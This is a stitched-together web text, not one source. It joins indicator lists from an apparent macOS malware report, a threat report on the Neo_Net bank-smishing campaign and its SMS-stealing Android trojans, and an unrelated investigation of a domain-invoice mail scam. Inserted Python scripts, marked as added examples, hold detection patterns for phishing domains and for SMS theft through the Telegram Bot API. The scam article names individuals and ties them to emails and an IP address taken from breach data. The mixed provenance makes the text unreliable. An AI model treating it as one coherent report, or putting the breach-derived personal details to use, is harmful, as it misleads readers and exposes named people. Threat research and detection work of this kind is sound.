To see how SentinelOne can help safeguard your organization’s macOS devices, contact us for more information or request a free demo.

Indicators of Compromise

Stage 2 Mach-Os

SHA1 Arch Lang
0df7e1d3b3d54336d986574441778c827ff84bf2 FAT objc
27b101707b958139c32388eb4fd79fcd133ed880 ARM objc
338af1d91b846f2238d5a518f951050f90693488 ARM objc
5304031dc990790a26184b05b3019b2c5fa7022a FAT swift
72167ec09d62cdfb04698c3f96a6131dceb24a9c ARM objc
7f9694b46227a8ebc67745e533bc0c5f38fdfa59 ARM objc
963a86aab1e450b03d51628797572fe9da8410a2 FAT objc
9676f0758c8e8d0e0d203c75b922bcd0aeaa0873 FAT objc
a7f5bf893efa3f6b489efe24195c05ff87585fe3 ARM swift
ac08406818bbf4fe24ea04bfd72f747c89174bdb x86 objc
acf1b5b47789badb519ff60dc93afa9e43bbb376 x86 swift
b02922869e86ad06ff6380e8ec0be8db38f5002b x86 objc
d5971e8a3e8577dbb6f5a9aad248c842a33e7a26 x86 objc
e0e42ac374443500c236721341612865cd3d1eec FAT objc
ed4f16b36bc47a701814b63e30d8ea7a226ca906 FAT swift
fd1cef5abe3e0c275671916a1f3a566f13489416 x86 objc

Stage 3 Version A Mach-Os

SHA1 Arch Lang
182760cbe11fa0316abfb8b7b00b63f83159f5aa FAT rust
3cc19cef767dee93588525c74fe9c1f1bf6f8007 ARM rust
831dc7bc4a234907d94a889bcb60b7bedf1a1e13 x86 rust
8e7b4a0d9a73ec891edf5b2839602ccab4af5bdf x86 rust

Stage 3 Version B Mach-Os

SHA1 Arch Lang
69f24956fb75beb9b93ef974d873914500e35601 ARM rust
8a1b32ab8c2a889985e530425ae00f4428c575cc FAT rust
b74702c9b82f23ebf76805f1853bc72236bee57c FAT rust
cd8f41b91e8f1d8625e076f0a161e46e32c62bbf x86 rust

Malicious PDFs

SHA1 Name
469236d0054a270e117a2621f70f2a494e7fb823 DOJ Report on Bizlato Investigation.pdf
574bbb76ef147b95dfdf11069aaaa90df968e542 Readme.pdf
7e69cb4f9c37fad13de85e91b5a05a816d14f490 InvestmentStrategy(Protected).pdf
7f8f43326f1ce505a8cd9f469a2ded81fa5c81be Jump Crypto Investment Agreement.pdf
be234cb6819039d6a1d3b1a205b9f74b6935bbcc DOJ Report on Bizlato Investigation_asistant.pdf
e7158bb75adf27262ec3b0f2ca73c802a6222379 Daiwa Ventures.pdf

Stage 1 Applications (.zip)

0738687206a88ecbee176e05e0518effa4ca4166
0be69bb9836b2a266bfd9a8b93bb412b6e4ce1be
5933f1a20117d48985b60b10b5e42416ac00e018
7a5d57c7e2b0c8ab7d60f7a7c7f4649f33fea8aa
7e1870a5b24c78a5e357568969aae3a5e7ab857d
89301dfdc5361f1650796fecdac30b7d86c65122
9121509d674091ce1f5f30e9a372b5dcf9bcd257
9a5f6a641cc170435f52c6a759709a62ad5757c7
a1a85cba1bc4ac9f6eafc548b1454f57b4dff7e0
ca59874172660e6180af2815c3a42c85169aa0b2
d9f1392fb7ed010a0ecc4f819782c179efde9687
e2bcdfbda85c55a4d6070c18723ba4adb7631807

AppleScript main.scpt
dabb4372050264f389b8adcf239366860662ac52

Communications
cloud[.]dnx.capital
crypto.hondchain[.]com.

File Paths

$TMPDIR/ErrorCheck.zip
/Users/Shared/1.zip
/Users/Shared/Internal PDF Viewer.app
/Users/Shared/.pd
~/Library/Metadata/System Update
~/Library/LaunchAgents/com.apple.systemupdate.plist

Neo_Net | The Kingpin of Spanish eCrime

In partnership with vx-underground, SentinelOne recently ran its first Malware Research Challenge, in which we asked researchers across the cybersecurity community to submit previously unpublished work to showcase their talents and bring their insights to a wider audience.

Today’s post marks the start of a series highlighting the best entries, beginning with the winner from Pol Thill.

This in-depth and meticulous research into a cybercrime threat actor targeting thousands of clients of financial institutions makes a significant contribution to our understanding of the cybersecurity landscape and is the worthy winner of our challenge.

Executive Summary

  • Neo_Net has been conducting an eCrime campaign targeting clients of prominent banks globally, with a focus on Spanish and Chilean banks, from June 2021 to April 2023.
  • Despite using relatively unsophisticated tools, Neo_Net has achieved a high success rate by tailoring their infrastructure to specific targets, resulting in the theft of over 350,000 EUR from victims’ bank accounts and compromising Personally Identifiable Information (PII) of thousands of victims.
  • The campaign employs a multi-stage attack strategy, starting with targeted SMS phishing messages distributed across Spain and other countries, using Sender IDs (SIDs) to create an illusion of authenticity and mimicking reputable financial institutions to deceive victims.
  • Neo_Net has established and rented out a wide-ranging infrastructure, including phishing panels and Android trojans, to multiple affiliates, sold compromised victim data to third parties, and launched a successful Smishing-as-a-Service offering targeting various countries worldwide.

Introduction

An extensive eCrime campaign has been observed targeting clients of prominent banks around the world from June 2021 to April 2023. Notably, the threat actors have predominantly focused on Spanish and Chilean banks, with 30 out of 50 targeted financial institutions headquartered in Spain or Chile, including major banks such as Santander, BBVA and CaixaBank. Banks targeted in other regions include Deutsche Bank, Crédit Agricole and ING. A complete list can be found in Appendix A at the end of this post.

Despite employing relatively unsophisticated tools, the threat actors have achieved a high success rate by tailoring their infrastructure to their specific targets. The campaign has resulted in the theft of over 350,000 EUR from victims’ bank accounts, along with the compromise of a significant amount of Personally Identifiable Information (PII), including telephone numbers, national identity numbers, and names from thousands of victims.

The mastermind behind this operation, known as Neo_Net, has established and rented out a wide-ranging infrastructure, including phishing panels, Smishing software, and Android trojans to multiple affiliates, sold compromised victim data to interested third parties, and has even launched a successful Smishing-as-a-Service offering that targets various countries worldwide. This report will provide a detailed overview of the campaign and delve into the background of Neo_Net, shedding light on his operations over the years.

Fig 1: Countries targeted by Neo_Net

eCrime Campaign against Financial Institutions

The campaign employed a sophisticated multi-stage attack strategy that commenced with targeted SMS phishing messages distributed across Spain using Neo_Net’s proprietary service, Ankarex. These messages leveraged Sender IDs (SIDs) to create an illusion of authenticity, mimicking reputable financial institutions in an attempt to deceive the victims.

Fig 2: Demonstration of Ankarex’s SID functionality in the Ankarex News Channel

The SMS messages employed various scare tactics, such as claiming that the victim’s account had been accessed by an unauthorized device or that their card had been temporarily limited due to security concerns. The messages also contained a hyperlink to the threat actor’s phishing page.

The phishing pages were meticulously set up using Neo_Net’s panels, PRIV8, and implemented multiple defense measures, including blocking requests from non-mobile user agents and concealing the pages from bots and network scanners. These pages were designed to closely resemble genuine banking applications, complete with animations to create a convincing façade:

Fig 3: BBVA and Santander phishing pages

Upon submission of their credentials, the victims’ information was surreptitiously exfiltrated to a designated Telegram chat via the Telegram Bot API, granting the threat actors unrestricted access to the stolen data, including the victims’ IP addresses and user agents.

Fig 4: Neo_Net’s affiliates discussing captured credentials and the corresponding bank account

Subsequently, the threat actors employed various techniques to circumvent the Multi-Factor Authentication (MFA) mechanisms commonly employed by banking applications. One such approach involved coaxing victims into installing a purported security application for their bank account on their Android devices.

Fig 5: Android application impersonating ING

However, this application served no legitimate security purpose and merely requested permissions to send and view SMS messages.

Fig 6: BBVA application showing the SMS permission request after victim clicks on “Actualizar” button

In reality, these Android trojans functioned as modified versions of the publicly available Android SMS spyware known as SMS Eye. Some threat actors further obfuscated the trojan using public packers to evade detection by anti-malware solutions. These Android trojans covertly exfiltrated incoming SMS messages to a distinct dedicated Telegram chat.
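The profile described in the last two paragraphs (an app branded as a bank that asks only for SMS permissions) can be screened for directly in an APK’s manifest. The script below is an added example, not code from the original report; it assumes the AndroidManifest.xml has already been decoded from the APK’s binary XML into text (apktool does this, for instance) and only performs the triage logic. The two sample manifests are constructed for illustration; the package and activity name and the impersonated brand are taken from Appendix B, while the receiver class name and the benign app are invented.

```python
"""Triage a decoded AndroidManifest.xml for the SMS-stealer profile described above."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
NAME = f"{{{ANDROID_NS}}}name"
LABEL = f"{{{ANDROID_NS}}}label"

# The permissions an app needs to read incoming texts (OTPs included) and to send them.
SMS_PERMISSIONS = {
    "android.permission.SEND_SMS",
    "android.permission.RECEIVE_SMS",
    "android.permission.READ_SMS",
}
INTERNET = "android.permission.INTERNET"
# Broadcast action delivered to registered receivers for every incoming SMS.
SMS_RECEIVED_ACTION = "android.provider.Telephony.SMS_RECEIVED"

# Constructed sample: package/activity and impersonated brand from Appendix B; the
# receiver class name is invented for illustration.
TROJAN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.neonet.app.reader">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <application android:label="BBVA">
    <activity android:name="com.neonet.app.reader.MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <receiver android:name="com.neonet.app.reader.SmsReceiver">
      <intent-filter>
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed benign sample: network access, no SMS capability, several screens.
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.example.notes">
  <uses-permission android:name="android.permission.INTERNET"/>
  <application android:label="Notes">
    <activity android:name="com.example.notes.ListActivity"/>
    <activity android:name="com.example.notes.EditActivity"/>
  </application>
</manifest>
"""


def triage_manifest(manifest_xml):
    """Summarise SMS-related capabilities declared in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    requested = {e.get(NAME) for e in root.iter("uses-permission")} - {None}
    app = root.find("application")
    label = app.get(LABEL, "") if app is not None else ""
    activities = [a.get(NAME) for a in root.iter("activity")]
    # A receiver filtering on SMS_RECEIVED sees every incoming text without the
    # user ever opening the app; combined with INTERNET it can forward them.
    sms_receiver = any(
        action.get(NAME) == SMS_RECEIVED_ACTION
        for receiver in root.iter("receiver")
        for action in receiver.iter("action")
    )

    sms = sorted(requested & SMS_PERMISSIONS)
    reasons = []
    if sms:
        reasons.append("requests SMS permissions: " + ", ".join(sms))
    if sms_receiver:
        reasons.append("registers a receiver for SMS_RECEIVED")
    if sms and INTERNET in requested:
        reasons.append("can forward SMS off-device (INTERNET)")
    if sms and len(activities) <= 1:
        reasons.append("single-screen app, yet SMS-capable")

    verdict = "review" if (sms and INTERNET in requested) else "low"
    return {
        "package": package,
        "label": label,
        "sms_permissions": sms,
        "activities": activities,
        "verdict": verdict,
        "reasons": reasons,
    }


if __name__ == "__main__":
    for manifest in (TROJAN_MANIFEST, BENIGN_MANIFEST):
        result = triage_manifest(manifest)
        print(result["package"], result["label"], result["verdict"], result["reasons"])
```

A genuine banking app may legitimately request SMS permissions for OTP autofill, so the verdict is “review”, not “malicious”; the combination the report describes (bank branding, SMS read/send plus network access, a single activity) is what should send a sample to an analyst.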

Fig 7: Telegram messages showing exfiltrated BBVA OTPs

The exfiltrated messages could then be utilized to bypass MFA on the targeted accounts by capturing One-Time Passwords (OTPs). Additionally, the threat actors were also observed employing direct phone calls to victims, possibly to impersonate bank representatives and deceive victims into installing the Android spyware or divulging OTPs.

The threat actors employed this method to target clients of several prominent banks around the world.

The funds illicitly acquired from victims during the course of the year-long operation amounted to a minimum of 350,000 EUR. However, it is probable that the actual sum is significantly higher, as older operations and transactions that do not involve SMS confirmation messages may not be fully accounted for due to limited visibility.

Neo_Net

Neo_Net, the prominent actor responsible for the global cybercrime campaign, has been active in the cybersecurity landscape at least since early 2021. He maintains a public GitHub profile under the name “notsafety” and a Telegram account that showcases his work and identifies him as the founder of Ankarex, a Smishing-as-a-Service platform.

Fig 8: Neo_Net’s Telegram profile

Through his contributions on Telegram, Neo_Net has been linked to the “macosfera.com” forum, a Spanish-language IT forum. Email addresses registered with the forum’s domain were found in relation to several phishing panels created by Neo_Net, targeting Spanish banks and other institutions. These email addresses were used as usernames for the panels, suggesting that Neo_Net may have collaborated with individuals from this forum to set up his infrastructure. The phishing panels also clearly indicate Neo_Net as the creator, with his signature at the top of the PHP files.

Fig 9: Phishing panels with links to macosfera[.]com (VirusTotal)

Ankarex

Neo_Net’s main creation is the Ankarex Smishing-as-a-Service platform, which has been active since at least May 2022. The Ankarex News Channel on Telegram, which advertises the service, currently has 1700 subscribers and regularly posts updates about the software, as well as limited offers and giveaways.

Fig 10: Halloween offer for 15% extra funds when recharging the account

The service itself is accessible at ankarex[.]net, and once registered, users can upload funds using cryptocurrency transfers and launch their own Smishing campaigns by specifying the SMS content and target phone numbers. Ankarex currently targets 9 countries but has historically operated in additional regions.

Fig 11: Ankarex target countries and prices list

In addition to the Smishing service, Neo_Net has also offered leads, including victims’ names, email addresses, IBANs, and phone numbers for sale on the Ankarex Channel. He has also advertised his Android SMS spyware service to selected members. Notably, every channel created to exfiltrate the captured SMS messages has Neo_Net listed as an administrator, and several package names of the Android trojans allude to their creator with names such as com.neonet.app.reader. It is likely that Neo_Net rented his infrastructure to affiliates, some of whom have been observed working with him on multiple unique campaigns, allowing them to conduct phishing and funds transfers independently.

Fig 12: Neo_Net demonstrating Ankarex on his own phone and exhibiting remarkable OPSEC throughout his campaigns

Throughout his year-long operation, Neo_Net has been traced back to several unique IP addresses, indicating that he currently resides in Mexico. Neo_Net primarily operates in Spanish-speaking countries and communicates predominantly in Spanish with his affiliates. Communication in the Ankarex channel is almost exclusively done in Spanish.

However, Neo_Net has also been observed collaborating with non-Spanish speakers, including another cybercriminal identified by the Telegram handle devilteam666. This particular operation involved the use of Google Ads targeting crypto wallet owners, and devilteam666 continues to offer malicious Google Ads services on his Telegram channel.

Conclusion

Despite employing mostly unsophisticated tools and techniques, such as simple SMS spyware and phishing panels, Neo_Net and his affiliates have managed to steal hundreds of thousands of euros and compromise the personally identifiable information (PII) of thousands of victims worldwide. The success of their campaigns can be attributed to the highly targeted nature of their operations, often focusing on a single bank, and copying their communications to impersonate bank agents. Furthermore, due to the simplicity of SMS spyware, it can be difficult to detect, as it only requires permission to send and view SMS messages.

Neo_Net has also been observed reusing compromised PII for further profit. A significant amount of eCrime against mobile users in Spain over the past two years can be directly traced back to Neo_Net’s operation, including his phishing panels, Smishing-as-a-Service platform, and Android trojans.

These campaigns highlight that while Multi-Factor Authentication is robust, it can be circumvented if it relies on SMS, and that physical tokens or external applications would provide better protection in such cases.

Acknowledgments

Special thanks go to @malwrhunterteam who posted about several samples used in this campaign on his Twitter account.

Appendix A: Targeted Financial Institutions

  • Spain: Santander, BBVA, CaixaBank, Sabadell, ING España, Unicaja, Kutxabank, Bankinter, Abanca, Laboral Kutxa, Ibercaja, BancaMarch, CajaSur, OpenBank, Grupo Caja Rural, Cajalmendralejo, MoneyGo, Cecabank, Cetelem, Colonya, Self Bank, Banca Pueyo
  • France: Crédit Agricole, Caisse d’Epargne, La Banque postale, Boursorama, Banque de Bretagne
  • Greece: National Bank of Greece
  • Germany: Sparkasse, Deutsche Bank, Commerzbank
  • United Kingdom: Santander UK
  • Austria: BAWAG P.S.K.
  • Netherlands: ING
  • Poland: PKO Bank Polski
  • Chile: BancoEstado, Scotiabank (Cencosud Scotiabank), Santander (officebanking), Banco Ripley, Banco de Chile, Banco Falabella, Banco de Crédito e Inversiones, Itaú CorpBanca
  • Colombia: Bancolombia
  • Venezuela: Banco de Venezuela
  • Peru: BBVA Peru
  • Ecuador: Banco Pichincha
  • Panama: Zinli
  • USA: Prosperity Bank, Greater Nevada Credit Union
  • Australia: CommBank

Appendix B

Indicators of Compromise

| APK SHA1 Hash | Main Activity Name | Impersonated Institution |
|---|---|---|
| de8929c1a0273d0ed0dc3fc55058e0cb19486b3c | com.neonet.app.reader.MainActivity | BBVA |
| b344fe1bbb477713016d41d996c0772a308a5146 | com.neonet.app.reader.MainActivity | Laboral Kutxa |
| 8a099af61f1fa692f45538750d42aab640167fd2 | com.neonet.app.reader.MainActivity | Correos |
| ab14161e243d478dac7a83086ed4839f8ad7ded8 | com.neonet.app.reader.MainActivity | BBVA |
| ded2655512de7d3468f63f9487e16a0bd17818ff | com.neonet.app.reader.MainActivity | CaixaBank |
| a5208de82def52b4019a6d3a8da9e14a13bc2c43 | com.neonet.app.reader.MainActivity | CaixaBank |
| 21112c1955d131fa6cab617a3d7265acfab783c2 | com.neonet.app.reader.MainActivity | Openbank |
| 6ea53a65fe3a1551988c6134db808e622787e7f9 | com.neonet.app.reader.MainActivity | Unicaja |
| 62236a501e11d5fbfe411d841caf5f2253c150b8 | com.neonet.app.reader.MainActivity | BBVA |
| 7f0c3fdbfcdfc24c2da8aa3c52aa13f9b9cdda84 | com.neonet.app.reader.MainActivity | BBVA |
| f918a6ecba56df298ae635a6a0f008607b0420b9 | com.neonet.app.reader.MainActivity | Santander |
| ffbcdf915916595b96f627df410722cee5b83f13 | com.neonet.app.reader.MainActivity | BBVA |
| 7b4ab7b2ead7e004c0d93fe916af39c156e0bc61 | com.neonet.app.reader.MainActivity | CajaSur |
| 34d0faea99d94d3923d0b9e36ef9e0c48158e7a0 | com.neonet.app.reader.MainActivity | BBVA |
| e6c485551d4f209a0b7b1fa9aa78b7efb51be49b | com.neonet.app.reader.MainActivity | BBVA |
| 1df3ed2e2957efbd1d87aac0c25a3577318b8e2a | com.neonet.app.reader.MainActivity | BBVA |
| 6a907b8e5580a5067d9fb47ef21826f164f68f3f | com.neonet.app.reader.MainActivity | Grupo Caja Rural |
| 5d1c7ff3d16ec770cf23a4d82a91358b9142d21a | com.neonet.app.reader.MainActivity | Grupo Caja Rural |
| 86ad0123fa20b7c0efb6fe8afaa6a756a86c9836 | com.neonet.app.reader.MainActivity | Grupo Caja Rural |
| 14a36f18a45348ad9efe43b20d049f3345735163 | com.neonet.app.reader.MainActivity | Cajalmendralejo |
| b506503bb71f411bb34ec8124ed26ae27a4834b9 | com.neonet.app.reader.MainActivity | BBVA |
| afe84fa17373ec187781f72c330dfb7bb3a42483 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 445468cd5c298f0393f19b92b802cfa0f76c32d4 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 8491ff15ad27b90786585b06f81a3938d5a61b39 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 2714e0744ad788142990696f856c5ffbc7173cf4 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 1ce0afe5e09b14f8aee6715a768329660e95121e | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 96a3600055c63576be9f7dc97c5b25f1272edd2b | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 9954ae7d31ea65cd6b8cbdb396e7b99b0cf833f4 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 07159f46a8adde95f541a123f2dda6c49035aad1 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| ab19a95ef3adcb83be76b95eb7e7c557812ad2f4 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| db8eeab4ab2e2e74a34c47ad297039485ff75f22 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| dbf0cec18caabeb11387f7e6d14df54c808e441d | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 69d38eed5dc89a7b54036cc7dcf7b96fd000eb92 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| c38107addc00e2a2f5dcb6ea0cbce40400c23b49 | com.cannav.cuasimodo.jumper.actividades | BBVA |
| 279048e07c25fd75c4cef7c64d1ae741e178b35b | com.uklapon.mafin.chinpiling.actividades | Bankinter |
| ef8c5d639390d9ba138ad9c2057524ff6e1398de | | BBVA |
| e7c2d0c80125909d85913dfb941bdc373d677326 | | ING |
| 145bd67f94698cc5611484f46505b3dc825bd6cd | | BancoEstado |


Phishing Domains

bbva.info-cliente[.]net
santander.esentregas[.]ga
bbva.esentregas[.]ga
correos.esentregas[.]ga

Appendix C: MITRE ATT&CK Tags

| ID | Technique | Explanation |
|---|---|---|
| T1406.002 | Obfuscated Files or Information: Software Packing | Some APK files are packed and drop the unpacked dex file once executed |
| T1633.001 | Virtualization/Sandbox Evasion: System Checks | Some APK files have been modified and initially check for common sandbox names before unpacking |
| T1426 | System Information Discovery | The Sms Eye trojan collects the brand and model of the infected phone |
| T1636.004 | Protected User Data: SMS Messages | The Sms Eye trojan collects incoming SMS messages |
| T1437.001 | Application Layer Protocol: Web Protocols | The Sms Eye trojan exfiltrates SMS messages over HTTPS |
| T1481.003 | Web Service: One-Way Communication | The Sms Eye trojan uses the Telegram Bot API to exfiltrate SMS messages |
| T1521.002 | Encrypted Channel: Asymmetric Cryptography | The C2 channel is encrypted by TLS |
| T1646 | Exfiltration Over C2 Channel | The SMS messages are exfiltrated over the C2 channel |
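The appendices above give file hashes and phishing domains (Appendix B) and describe how the trojan exfiltrates SMS messages, over HTTPS to the Telegram Bot API (Appendix C, T1437.001 and T1481.003). As an added example that is not part of the original report, the Python script below shows one way a defender can apply both: it refangs the published domains, matches hostnames in proxy log lines (including subdomains and trailing-dot DNS forms), flags requests to the Telegram Bot API, and looks up file hashes against an indicator table. The log line format, the file bytes and the bot token in the sample data are constructed; the `api.telegram.org` host is Telegram's real API endpoint, and the `bot<id>:<token>` path shape is the documented Bot API URL form.

```python
"""Added example (not from the original report): apply the Appendix B / C
indicators to local artefacts.  Hashes and domains are copied from the
appendices; the log lines, file contents and bot token are constructed."""
import hashlib
import re

# Three of the APK SHA1 hashes from Appendix B (lower-case hex -> institution).
APK_SHA1_IOCS = {
    "de8929c1a0273d0ed0dc3fc55058e0cb19486b3c": "BBVA",
    "279048e07c25fd75c4cef7c64d1ae741e178b35b": "Bankinter",
    "e7c2d0c80125909d85913dfb941bdc373d677326": "ING",
}

# Phishing domains from Appendix B, kept defanged exactly as published.
DEFANGED_DOMAINS = [
    "bbva.info-cliente[.]net",
    "santander.esentregas[.]ga",
    "bbva.esentregas[.]ga",
    "correos.esentregas[.]ga",
]


def refang(indicator: str) -> str:
    """Turn a defanged indicator ('[.]', 'hxxp') back into a matchable string."""
    return indicator.replace("[.]", ".").replace("hxxp", "http").lower()


PHISHING_DOMAINS = {refang(d) for d in DEFANGED_DOMAINS}

# T1437.001 / T1481.003: SMS exfiltration as an HTTPS call to the Telegram
# Bot API.  api.telegram.org is the real endpoint; 'bot<id>:<token>/<method>'
# is the documented Bot API URL shape (the token value in the test is made up).
TELEGRAM_BOT_RE = re.compile(
    r"https?://api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/(?:sendMessage|sendDocument)"
)


def sha1_of_bytes(data: bytes) -> str:
    """Hex SHA1 of a file's bytes, the form used in the Appendix B table."""
    return hashlib.sha1(data).hexdigest()


def match_apk(data: bytes, iocs=None):
    """Return the impersonated institution for a known-bad APK, else None.

    'iocs' defaults to the Appendix B subset above; a caller may pass its own
    hash -> label table (the test does, with a constructed entry)."""
    table = APK_SHA1_IOCS if iocs is None else iocs
    return table.get(sha1_of_bytes(data))


def domain_matches(host: str) -> bool:
    """True if host is a listed phishing domain or any subdomain of one."""
    h = host.lower().rstrip(".")  # tolerate the trailing dot seen in DNS logs
    return any(h == d or h.endswith("." + d) for d in PHISHING_DOMAINS)


def scan_log_line(line: str) -> list:
    """Findings for one constructed proxy log line: '<timestamp> <client> <url-or-host>'."""
    parts = line.split()
    if len(parts) < 3:
        return []
    target = parts[2]
    host_match = re.match(r"^(?:https?://)?([^/:?]+)", target)
    host = host_match.group(1) if host_match else target
    findings = []
    if domain_matches(host):
        findings.append(f"phishing-domain:{host}")
    if TELEGRAM_BOT_RE.match(target):
        findings.append("telegram-bot-api-exfil")
    return findings


def scan_log(lines) -> dict:
    """Map line index -> findings for every line that triggered at least one."""
    results = {}
    for i, line in enumerate(lines):
        hits = scan_log_line(line)
        if hits:
            results[i] = hits
    return results


# Constructed sample log (not real traffic).
SAMPLE_LOG = [
    "2023-06-01T10:00:00Z 10.0.0.5 https://bbva.esentregas.ga/login",
    "2023-06-01T10:00:01Z 10.0.0.5 https://www.example.org/",
    "2023-06-01T10:00:02Z 10.0.0.7 https://api.telegram.org/bot123456:ABC-def_ghi/sendMessage?chat_id=1&text=sms",
    "2023-06-01T10:00:03Z 10.0.0.9 correos.esentregas.ga.",
]

if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_LOG).items():
        print(idx, SAMPLE_LOG[idx], "->", hits)
    print("constructed bytes matched:", match_apk(b"not a real apk"))
```

The Telegram rule is deliberately narrow (host plus the Bot API path shape), since the host alone is common in legitimate traffic; on a mobile device fleet, a hit should be correlated with the app that generated it rather than blocked outright.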

Who’s Behind the DomainNetworks Snail Mail Scam?

If you’ve ever owned a domain name, the chances are good that at some point you’ve received a snail mail letter which appears to be a bill for a domain or website-related services. In reality, these misleading missives try to trick people into paying for useless services they never ordered, don’t need, and probably will never receive. Here’s a look at the most recent incarnation of this scam — DomainNetworks — and some clues about who may be behind it.

The DomainNetworks mailer may reference a domain that is or was at one point registered to your name and address. Although the letter includes the words “marketing services” in the upper right corner, the rest of the missive is deceptively designed to look like a bill for services already rendered.

DomainNetworks claims that listing your domain with their promotion services will result in increased traffic to your site. This is a dubious claim for a company that appears to be a complete fabrication, as we’ll see in a moment. But happily, the proprietors of this enterprise were not so difficult to track down.

The website Domainnetworks[.]com says it is a business with a post office box in Hendersonville, N.C., and another address in Santa Fe, N.M. There are a few random, non-technology businesses tied to the phone number listed for the Hendersonville address, and the New Mexico address was used by several no-name web hosting companies.

However, there is little connected to these addresses and phone numbers that gets us any closer to finding out who’s running Domainnetworks[.]com. And neither entity appears to be an active, official company in its supposed state of residence, at least according to each state’s Secretary of State database.

The Better Business Bureau listing for DomainNetworks gives it an “F” rating, and includes more than 100 reviews by people angry at receiving one of these scams via snail mail. Helpfully, the BBB says DomainNetworks previously operated under a different name: US Domain Authority LLC.

DomainNetworks has an “F” reputation with the Better Business Bureau.

Copies of snail mail scam letters from US Domain Authority posted online show that this entity used the domain usdomainauthority[.]com, registered in May 2022. The Usdomainauthority mailer also featured a Henderson, NC address, albeit at a different post office box.

Usdomainauthority[.]com is no longer online, and the site seems to have blocked its pages from being indexed by the Wayback Machine at archive.org. But searching on a long snippet of text from DomainNetworks[.]com about refund requests shows that this text was found on just one other active website, according to publicwww.com, a service that indexes the HTML code of existing websites and makes it searchable.

A deceptive snail mail solicitation from DomainNetwork’s previous iteration — US Domain Authority. Image: Joerussori.com

That other website is a domain registered in January 2023 called thedomainsvault[.]com, and its registration details are likewise hidden behind privacy services. Thedomainsvault’s “Frequently Asked Questions” page is quite similar to the one on the DomainNetworks website; both begin with the question of why the company is sending a mailer that looks like a bill for domain services.

Thedomainsvault[.]com includes no useful information about the entity or people who operate it; clicking the “Contact-us” link on the site brings up a page with placeholder Lorem Ipsum text, a contact form, and a phone number of 123456789.

However, searching passive DNS records at DomainTools.com for thedomainsvault[.]com shows that at some point whoever owns the domain instructed incoming email to be sent to ubsagency@gmail.com.

The first result that currently pops up when searching for “ubsagency” in Google is ubsagency[.]com, which says it belongs to a Las Vegas-based Search Engine Optimization (SEO) and digital marketing concern generically named both United Business Service and United Business Services. UBSagency’s website is hosted at the same Ann Arbor, Mich.-based hosting firm (A2 Hosting Inc) as thedomainsvault[.]com.

UBSagency’s LinkedIn page says the company has offices in Vegas, Half Moon Bay, Calif., and Renton, Wash. But once again, none of the addresses listed for these offices reveal any obvious clues about who runs UBSagency. And once again, none of these entities appear to exist as official businesses in their claimed state of residence.

Searching on ubsagency@gmail.com in Constella Intelligence shows the address was used sometime before February 2019 to create an account under the name “SammySam_Alon” at the interior decorating site Houzz.com. In January 2019, Houzz acknowledged that a data breach exposed account information on an undisclosed number of customers, including user IDs, one-way encrypted passwords, IP addresses, city and ZIP codes, as well as Facebook information.

SammySam_Alon registered at Houzz using an Internet address in Huntsville, Ala. (68.35.149.206). Constella says this address was associated with the email tropicglobal@gmail.com, which also is tied to several other “Sammy” accounts at different stores online.

Constella also says a highly unique password re-used by tropicglobal@gmail.com across numerous sites was used in connection with just a few other email accounts, including shenhavgroup@gmail.com, and distributorinvoice@mail.com.

The shenhavgroup@gmail.com address was used to register a Twitter account for a Sam Orit Alon in 2013, whose account says they are affiliated with the Shenhav Group. According to DomainTools, shenhavgroup@gmail.com was responsible for registering roughly two dozen domains, including the now-defunct unitedbusinessservice[.]com.

Constella further finds that the address distributorinvoice@mail.com was used to register an account at whmcs.com, a web hosting platform that suffered a breach of its user database several years back. The name on the WHMCS account was Shmuel Orit Alon, from Kidron, Israel.

UBSagency also has a Facebook page, or maybe “had” is the operative word because someone appears to have defaced it. Loading the Facebook page for UBSagency shows several of the images have been overlaid or replaced with a message from someone who is really disappointed with Sam Alon.

“Sam Alon is a LIAR, THIEF, COWARD AND HAS A VERY SMALL D*CK,” reads one of the messages:

The current Facebook profile page for UBSagency includes a logo that is similar to the DomainNetworks logo.

The logo in the UBSagency profile photo includes a graphic of what appears to be a magnifying glass with a line that zig-zags through bullet points inside and outside the circle, a unique pattern that is remarkably similar to the logo for DomainNetworks:

The logos for DomainNetworks (left) and UBSagency.

Constella also found that the same Huntsville IP address used by Sam Alon at Houzz was associated with yet another Houzz account, this one for someone named “Eliran.”

The UBSagency Facebook page features several messages from an Eliran “Dani” Benz, who is referred to by commenters as an employee or partner with UBSagency. The last check-in on Benz’s profile is from a beach at Rishon Le Siyon in Israel earlier this year.

Neither Mr. Alon nor Mr. Benz responded to multiple requests for comment.

It may be difficult to believe that anyone would pay an invoice for a domain name or SEO service they never ordered. However, there is plenty of evidence that these phony bills often get processed by administrative personnel at organizations that end up paying the requested amount because they assume it was owed for some services already provided.

In 2018, KrebsOnSecurity published How Internet Savvy are Your Leaders?, which examined public records to show that dozens of cities, towns, school districts and even political campaigns across the United States got snookered into paying these scam domain invoices from a similar scam company called WebListings Inc.

In 2020, KrebsOnSecurity featured a deep dive into who was likely behind the WebListings scam, which had been sending out these snail mail scam letters for over a decade. That investigation revealed the scam’s connection to a multi-level marketing operation run out of the U.K., and to two brothers living in Scotland.